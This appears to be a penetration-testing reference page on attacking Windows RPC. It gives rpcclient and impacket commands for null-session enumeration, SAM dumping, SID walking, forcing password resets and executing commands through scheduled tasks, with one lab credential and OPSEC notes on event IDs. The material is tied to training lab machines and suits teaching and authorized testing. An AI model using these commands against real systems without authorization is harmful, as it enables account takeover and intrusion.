Back to All Modules

RPC Exploitation

#Overview

Remote Procedure Call (RPC) on port 135/TCP (with high-port endpoints) provides inter-process communication on Windows systems. RPC null sessions allow enumeration of users, groups, shares, and SIDs without authentication. With credentials, RPC can be leveraged to create services, schedule tasks, and access the remote registry.

#Prerequisites

  • rpcclient (part of Samba suite)
  • impacket suite (rpcdump.py, samrdump.py, lookupsid.py)
  • Valid credentials for service creation and registry access

#Detection & Enumeration

#RPC Null Session Enumeration

rpcclient -U "" -N <IP>                           # Connect with null session
# Once connected:
rpcclient $> srvinfo                              # Server information
rpcclient $> enumdomusers                          # Enumerate domain users
rpcclient $> enumdomgroups                         # Enumerate domain groups
rpcclient $> querydispinfo                         # Display information about users
rpcclient $> lookupnames <username>                # Look up SID for username
rpcclient $> netshareenumall                       # Enumerate shares
rpcclient $> lsaenumsid                            # Enumerate SIDs
BASH

#RPC with Credentials

rpcclient -U '<domain>/<user>%<password>' <IP>     # Authenticated connection
rpcclient -U 'blackfield/support%#00^BlackKnight' 10.10.10.192
BASH

#Password Reset via RPC

With ForceChangePassword privilege, reset another user's password:

rpcclient -U '<domain>/<user>' <IP>
rpcclient $> setuserinfo <target_user> 23 <new_password>   # Level 23 = password
BASH

#Impacket RPC Tools

impacket-rpcdump <IP>                             # Dump RPC endpoints
impacket-lookupsid <domain>/<user>:<pass>@<IP>     # Enumerate users via SID walking
impacket-samrdump <domain>/<user>:<pass>@<IP>      # Dump SAM via RPC
impacket-services.py <domain>/<user>:<pass>@<IP> list  # List services via RPC
BASH

#Exploitation / Execution

#Service Creation via RPC

Services can be created remotely to execute binaries:

rpcclient $> svcenum                              # Enumerate existing services
# Create and start a service using impacket-services.py or sc.exe
BASH

#Task Scheduling via ATSVC

The ATSVC named pipe allows remote task scheduling:

impacket-atexec.py <domain>/<user>:<pass>@<IP> cmd.exe  # Execute via scheduled task
BASH

#Remote Registry Access

# Query and modify remote registry keys via SVCCTL
BASH

#Common Pitfalls

  • Warning: RPC null sessions are disabled on modern Windows systems (post-Server 2003) unless explicitly enabled
  • Warning: High-port dynamic RPC endpoints may be blocked by firewalls between network segments

#OPSEC Considerations

  • Shield: RPC enumeration generates Event ID 5145 (network share object checks)
  • Shield: The number of SID enumeration requests is visible and can be flagged as reconnaissance
  • Shield: Password reset operations generate Event ID 4724

#Post-Exploitation Value

  • User/group enumeration reveals privileged accounts and attack paths
  • SID walking reveals all domain objects including trust relationships
  • Password reset capability enables account takeover
  • Service creation enables persistence and lateral movement

#Cross-References

#Tool References

ToolLink
rpcclientBuilt-in with Samba
impackethttps://github.com/fortra/impacket

#Source Machines

  • Active (Easy, AD) - RPC/SMB enumeration and GPP extraction
  • Blackfield (Hard, AD) - RPC password reset via ForceChangePassword
  • Support (Easy, AD) - RPC enumeration for domain discovery